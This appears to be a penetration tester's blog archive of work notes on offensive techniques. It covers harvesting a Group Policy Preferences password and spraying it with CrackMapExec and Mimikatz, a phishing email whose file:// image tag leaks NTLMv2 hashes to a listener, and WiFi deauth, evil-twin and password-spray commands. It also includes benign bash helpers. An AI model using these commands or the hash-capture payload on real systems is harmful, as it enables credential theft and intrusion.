Category Archives: Pentesting

Shell Types

Sometimes, I have a hard time getting my brain around certain things. One such example is a bind shell and reverse shell. After reading the Metasploit section in Georgia Weidman’s Intro to Pentesting book, it all became clear.

In short, bind shell = I connect to you. Reverse shell, you connect to me. Simple.

Since I like analogies, here goes.

Bind shell. I have your phone number (IP address) and phone extension (port number). I call you on the phone. You answer. Now I can ask you to do things for me. Pretty straightforward. Except sometimes, there’s an operator in between. “You want to talk to who? Who is this? No, I will not put you through.” Maybe the operator even tells you “I just blocked that call for you. Bad, bad people.”

Because I can’t get through the operator (aka firewall), I might ask you to call me instead. I give you my phone number (LHOST) and my extension (LHOST, often 4444). So I call you, I’m blocked, but this triggers you to call me back. Now we have an open connection where I can ask you to do things for me. This is the reverse shell.

But then some companies realize this trick and they don’t let any phones call any other phone with an extension of 4444, aka egress filtering. But it’s totally normal and expected to call people on extension 80 or 443, so I ask you to call me on one of those. The filtering sees it as normal traffic and voila, we have a shell!

72 total views, no views today

Learning OSCP

Gonna be fun. I think the first step is to do everything in the PWK Syllabus. Then take the course.  https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf

1. – Getting Comfortable with Kali Linux
1.1 – Finding Your Way Around Kali
1.1.1 – Booting Up Kali Linux

1.1.2 – The Kali Menu


1.1.3 – Find, Locate, and Which


1.2 – Managing Kali Linux Services
1.2.1 – Default root Password
It’s toor…change it!

1.2.2 – SSH Service
1.2.3 – HTTP Service
1.3 – The Bash Environment
1.4 – Intro to Bash Scripting

2. – The Essential Tools
2.1 – Netcat
2.1.1 – Connecting to a TCP/UDP Port
2.1.2 – Listening on a TCP/UDP Port
2.1.3 – Transferring Files with Netcat
2.1.4 – Remote Administration with Netcat
2.2 – Ncat
2.3 – Wireshark
2.3.1 – Wireshark Basics
2.3.2 – Making Sense of Network Dumps
2.3.3 – Capture and Display Filters
2.3.4 – Following TCP Streams
2.4 – Tcpdump
2.4.1 – Filtering Traffic
2.4.2 – Advanced Header Filtering

3. – Passive Information Gathering
3.1 – Open Web Information Gathering
3.1.1 – Google
3.1.2 – Google Hacking
3.2 – Email Harvesting
3.3 – Additional Resources
3.3.1 – Netcraft
3.3.2 – Whois Enumeration
3.4 – Recon-ng

4. – Active Information Gathering
4.1 – DNS Enumeration
4.1.1 – Interacting with a DNS Server
4.1.2 – Automating Lookups
4.1.3 – Forward Lookup Brute Force
4.1.4 – Reverse Lookup Brute Force
4.1.5 – DNS Zone Transfers
4.1.6 – Relevant Tools in Kali Linux
4.2 – Port Scanning
4.2.1 – TCP CONNECT / SYN Scanning
4.2.2 – UDP Scanning
4.2.3 – Common Port Scanning Pitfalls
4.2.4 – Port Scanning with Nmap
4.2.5 – OS Fingerprinting
4.2.6 – Banner Grabbing/Service Enumeration
4.2.7 – Nmap Scripting Engine (NSE)
4.3 – SMB Enumeration
4.3.1 – Scanning for the NetBIOS Service
4.3.2 – Null Session Enumeration
4.3.3 – Nmap SMB NSE Scripts
4.4 – SMTP Enumeration
4.5 – SNMP Enumeration
4.5.1 – MIB Tree
4.5.2 – Scanning for SNMP
4.5.3 – Windows SNMP Enumeration Example

5. – Vulnerability Scanning
5.1 – Vulnerability Scanning with Nmap
5.2 – The OpenVAS Vulnerability Scanner
5.2.1 – OpenVAS Initial Setup

6. – Buffer Overflows
6.1 – Fuzzing
6.1.1 – Vulnerability History
6.1.2 – A Word About DEP and ASLR
6.1.3 – Interacting with the POP3 Protocol

7. – Win32 Buffer Overflow Exploitation
7.1 – Replicating the Crash
7.2 – Controlling EIP
7.2.1 – Binary Tree Analysis
7.2.2 – Sending a Unique String
7.3 – Locating Space for Your Shellcode
7.4 – Checking for Bad Characters
7.5 – Redirecting the Execution Flow
7.5.1 – Finding a Return Address
7.6 – Generating Shellcode with Metasploit
7.7 – Getting a Shell
7.8 – Improving the Exploit

8. – Linux Buffer Overflow Exploitation
8.1 – Setting Up the Environment
8.2 – Crashing Crossfire
8.3 – Controlling EIP
8.4 – Finding Space for Our Shellcode
8.5 – Improving Exploit Reliability
8.6 – Discovering Bad Characters
8.7 – Finding a Return Address
8.8 – Getting a Shell

9. – Working with Exploits
9.1 – Searching for Exploits
9.1.1 – Finding Exploits in Kali Linux
9.1.2 – Finding Exploits on the Web
9.2 – Customizing and Fixing Exploits
9.2.1 – Setting Up a Development Environment
9.2.2 – Dealing with Various Exploit Code Languages

10. – File Transfers
10.1 – A Word About Anti Virus Software
10.2 – File Transfer Methods
10.2.1 – The Non-Interactive Shell
10.2.2 – Uploading Files

11. – Privilege Escalation
11.1 – Privilege Escalation Exploits
11.1.1 – Local Privilege Escalation Exploit in Linux Example
11.1.2 – Local Privilege Escalation Exploit in Windows Example
11.2 – Configuration Issues
11.2.1 – Incorrect File and Service Permissions
11.2.2 – Think Like a Network Administrator

12. – Client Side Attacks
12.1 – Know Your Target
12.1.1 – Passive Client Information Gathering
12.1.2 – Active Client Information Gathering
12.1.3 – Social Engineering and Client Side Attacks
12.2 – MS12-037- Internet Explorer 8 Fixed Col Span ID
12.2.1 – Setting up the Client Side Exploit
12.2.2 – Swapping Out the Shellcode
12.3 – Java Signed Applet Attack

13. – Web Application Attacks
13.1 – Essential Iceweasel Add-ons
13.2 – Cross Site Scripting (XSS)
13.2.1 – Browser Redirection and IFRAME Injection
13.2.2 – Stealing Cookies and Session Information
13.3 – File Inclusion Vulnerabilities
13.3.1 – Local File Inclusion
13.3.2 – Remote File Inclusion
13.4 – MySQL SQL Injection
13.4.1 – Authentication Bypass
13.4.2 – Enumerating the Database
13.4.3 – Column Number Enumeration
13.4.4 – Understanding the Layout of the Output
13.4.5 – Extracting Data from the Database
13.4.6 – Leveraging SQL Injection for Code Execution
13.5 – Web Application Proxies
13.6 – Automated SQL Injection Tools

14. – Password Attacks
14.1 – Preparing for Brute Force
14.1.1 – Dictionary Files
14.1.2 – Key-space Brute Force
14.1.3 – Pwdump and Fgdump
14.1.4 – Windows Credential Editor (WCE)
14.1.6 – Password Profiling
14.1.7 – Password Mutating
14.2 – Online Password Attacks
14.2.1 – Hydra, Medusa, and Ncrack
14.2.2 – Choosing the Right Protocol: Speed vs. Reward
14.3 – Password Hash Attacks
14.3.1 – Password Hashes
14.3.2 – Password Cracking
14.3.3 – John the Ripper
14.3.4 – Rainbow Tables
14.3.5 – Passing the Hash in Windows

15. – Port Redirection and Tunneling
15.1 – Port Forwarding/Redirection
15.2 – SSH Tunneling
15.2.1 – Local Port Forwarding
15.2.2 – Remote Port Forwarding
15.2.3 – Dynamic Port Forwarding
15.3 – Proxychains
15.4 – HTTP Tunneling
15.5 – Traffic Encapsulation

16. – The Metasploit Framework
16.1 – Metasploit User Interfaces
16.2 – Setting up Metasploit Framework on Kali
16.3 – Exploring the Metasploit Framework
16.4 – Auxiliary Modules
16.4.1 – Getting Familiar with MSF Syntax
16.4.2 – Metasploit Database Access
16.5 – Exploit Modules
16.6 – Metasploit Payloads
16.6.1 – Staged vs. Non-Staged Payloads
16.6.2 – Meterpreter Payloads
16.6.3 – Experimenting with Meterpreter
16.6.4 – Executable Payloads
16.6.5 – Reverse HTTPS Meterpreter
16.6.6 – Metasploit Exploit Multi Handler
16.6.7 – Revisiting Client Side Attacks
16.7 – Building Your Own MSF Module
16.8 – Post Exploitation with Metasploit
16.8.1 – Meterpreter Post Exploitation Features
16.8.2 – Post Exploitation Modules

17. – Bypassing Antivirus Software
17.1 – Encoding Payloads with Metasploit
17.2 – Crypting Known Malware with Software Protectors
17.3 – Using Custom/Uncommon Tools and Payloads

110 total views, no views today

Who’s Down with GPP? Yeah You Know Me!

I figured it might be good to post about things that I learn on the job. This week, I was able to get a password out of Group Policy Preferences (GPP) with Metasploit.

Here’s a great writeup by Sean Metcalf on it.

First I tried capturing and relaying hashes with Responder and NTLMRelayx, but the targets did not give local administrator access to the accounts I was relaying. (Boo!) I was able to crack some of the hashes, but that didn’t help right away. So I had to look for something else. Since I did have some working credentials, I could then fire up Metasploit and see what happens against GPP. Using the auxiliary/scanner/smb/smb_enum_gpp module, I set the RHOST for a domain controller, gave it the username and password that I had previously captured and fired away. It started listing out the policies, like Groups.xml and a nice little table popped up like:

Name Value
—- —–
TYPE Groups.xml
USERNAME Administrator (built-in)
PASSWORD xxxxxxxxxx
DOMAIN CONTROLLER 192.168.19.14
DOMAIN example.com
CHANGED 2017-01-08 16:49:50
NEVER_EXPIRES? 1
DISABLED 0

Hooray!! So what do we do with that account? Spray it! That’s a local administrator account, so maybe it’ll have access elsewhere! How do we spray it? With CrackMapExec by byt3bl33d3r! Point that at all the hosts with SMB open and see what happens.

Run: cme smb IP -u Administrator -p SuperSecretPassword –local-auth

Hey, it worked! I know it worked because of that awesome “Pwn3d!” that CME shows. Next up, Mimikatz and see what’s in memory. So same command as above, but add the -M Mimikatz to it and see what comes up. Sure enough, there’s another set of credentials in clear text! Try that against the domain controller…NOW! Using CME again, with the new creds, against a DC and you know what? Pwn3d again! We are in! But as we know, DA is only the beginning and it’s time to find the data. So that’s what I learned this week, check the GPP for passwords!

235 total views, no views today

SMB Email

Not a new thing, just like most other posts, this is documentation.

If internal network access, scan with nmap for egress access, especially for port 445 and 139:

nmap -T4 -p0-65535 –max-retries 1 -sS -oA sweep_egress egadz.metasploit.com

If it’s closed, this probably isn’t going to work. If there is no access to test that, we’re flying blind and just hoping here.

Set up a listener on metasploit, I like auxiliary/server/capture/smb because it’s just so easy. Nothing to configure. Just “use” it and run.

Next, create an email for the target. In the email, include an html image tag and use file:// for the scheme. Point it to the metasploit server, and reference some non-existent image. Example: <img src=”file://192.168.1.10/image.jpg” /> This will create a broken image icon in the email, but when the user attempts to load from a Windows machine, the user’s NTLMv2 hash will be sent to the listener.

If you want to also craft a believable phishing email, you could also put a link to a web page that you control and on that web page, also include the same image tag. This is just in case the user’s mail client doesn’t allow downloading of images. But a browser will!

Once hash(es) are captured, shut down the listener and while still in metasploit, enter: creds

This will give the hashes in a format that a password cracker like hashcat will understand. For hashcat, use -m5600 for the NTLMv2 format. Also, ensure there is no extra whitespace around the hashes when loaded into hashcat, or there will be a string length exception.

Run the cracker and pray. If it cracks, congrats! If not in the time allotted, sorry!

 

226 total views, no views today

Create Screenshot Directory

Each week, I create a new directory for the test. It’s where I store notes, reports, artifacts, etc. I also create a screenshot directory and then set my system to auto-save screenshots to there. So I bash scripted it up. Here’s the script that will automatically create the new directory, the screenshot directory and tell my Mac system to save screenshots there:

#!/bin/bash

if [ “$1” == “” ]
then
echo “Usage: ./myscreens.sh [dirname]”
else
mkdir ~/Desktop/$1
mkdir ~/Desktop/jobs/$1/screens
defaults write com.apple.screencapture location ~/Desktop/$1/screens
killall SystemUIServer
fi

216 total views, 1 views today

WiFi

Doing a Wireless Penetration Test

Make sure you have everything you’ll need, since these always need to be on-site.

  • Computer (even better to bring more than 1), with Kali Linux installed
  • Power cords
  • WiFi Card(s) – at least 1 since they don’t like to work when they need to
  • Different antennas
  • MiFi, since they’re probably not going to let you on the network so easily
  • USB Hub, as the wireless card might need extra power
  • OEM power cords
  • Power strip – there’s a lot to plug in

That’s a good start.

Thanks to Ted Raffle for this writeup.

Start up Kali, plug in the card, run iwconfig to see whether it is connected

Get rid of unnecessary processes: airmon-ng check kill

Start the interface: airmon-ng start wlan0

To see networks and their MAC: airodump-ng –band abg -cswitch 1 wlan0mon

If you need to de-auth: aireplay-ng –deauth <number of packets or 0 for infinite> -a [MAC of AP] -c [MAC of client] wlan0mon

Capture a PSK: airodump-ng wlan0mon -c 1 –bssid [MAC of AP] –write <filename>

Turn handshake value into a hashcat value: wpaclean clean.cap <filename>-01.cap

And: aircrack-ng clean.cap -J hccap

hashcat -m 2500 hccap.hccap -w wordlist rules/rule

Evil Twin:

Have mana installed

Use Nick Sanzotta’s “manaSucks” script:

python manaSucks.py -iwlan0mon -m=<fake MAC address> –hostname ‘anything’ -s<SSID> -c6 –manaloud=0

For brute forcing the EAP network, get usernames, either also from Nick Sanzotta’s WiFiSuite, or from evil twin, or from scraping, use WiFiSuite:

python wifisuite.py -iwlan0mon -s”<SSID>” -u <username file> -p<password> spray

If you get guest network access, test for network segmentation. nmap the neighborhood looking for “up” hosts. If there are any, nmap them for services. Also check for nameservers.

If you get on the corporate network with credentials, it’s essentially now an internal assessment. Pick something to show risk and move on. After all, it’s a wireless assessment.

Test outside the building for access

Plug in a wifi repeater/AP, is it detected? Are there network access controls? (Probably not, and now you have internal access)

253 total views, 1 views today

Getting Organized

Learning how to get organized and put things in the proper place. I suspect that I’ll come back and add things like naming conventions. But this is what I got so far for organizing the information gathered during a pen test, in a directory.

Customer name

  • screenshots
  • services
  • scans
    • nexpose|appscan
    • nmap
      • xml
      • gnmap
      • nmap
    • pings
    • enum

As few nmap scans as possible, and name them after the network or if there is something else that makes sense. So the files may be named 192.168.10.10.gnnmap and so on.
Ping files are named the same way, but are prefixed with ping-
enum files are for enumerating a domain controller. These are prefixed with enum- and end with -dc
Services are IP addresses and the file is named with the service-host
All data is immediately removed and encrypted off the machine and deleted as soon as reasonably possible.

266 total views, 1 views today

Quick and Dirty Loop

Sometimes you gotta run a command lots of times. So let a loop do it. Here’s one example:

for ip in $(cat ips.txt); do
nslookup $ip >> nslookups.txt
done

This will take a file of IP addresses (ips.txt) and run nslookup on each IP and output the results to nslookups.txt. Or just remove the >> nslookups.txt if you want the output to the screen.

Easy.

256 total views, 1 views today

nslookup

Parsing nslookup

So today I had to convert IP addresses to hostnames. Seems easy enough, just use nslookup. But I had more than 400 IPs that needed to be converted. Ugh. So we need to do a little parsing.

First, take the IP addresses and get the host information. Let’s script this.

for ip in $(cat ips.txt); do
    nslookup $ip >> nslookups.txt
done

This will do an nslookup for each of the IPs in the ips.txt file. Great! Now we need to parse it. This should be pretty easy to just look for “name=” except sometimes, there isn’t a hostname and then “name=” doesn’t appear. So instead we look for something else that is always in there, regardless of whether there is a hostname. It seems the string “arpa” matches this. So the next step is to find that and then cut the hostname, or something that doesn’t look like a hostname if there isn’t one.

grep arpa nslookups.txt | cut -d " " -f3 > hostnames.txt

When this finishes, the hostnames.txt file will have one string per line, either the hostname or the word “can’t”. At this point, do a find/replace for “can’t” and make it blank (since there isn’t a hostname for that IP).

Now you have two files, one with all the IPs and one with the hostnames. Put them in two Excel columns and match them up. There is one more problem here that I haven’t found a good solution for yet. Some of the IPs may have more than one hostname. So when you match up the columns in Excel, you’ll likely have more hostnames than IPs. Unfortunately the only solution I have so far is to read through the nslookups.txt file, find the entries with more than one hostname and then manually fix this in the Excel file. It takes a little bit of time, but definitely better than running nslookup manually hundreds of times.

383 total views, 1 views today

Using WFuzz

Had a little bit of trouble figuring it out, so adding the format that I found here:

# wfuzz -c -z file,/usr/files/userfile -z file,/usr/files/passfile –ntlm FUZZ:FUZ2Z https:///

In a nutshell, the -z coincides with the “FUZZ”. Each subsequent payload/FUZZ combination points to the FUZ2Z or FUZ3Z and so on.

WFuzz Project

279 total views, 1 views today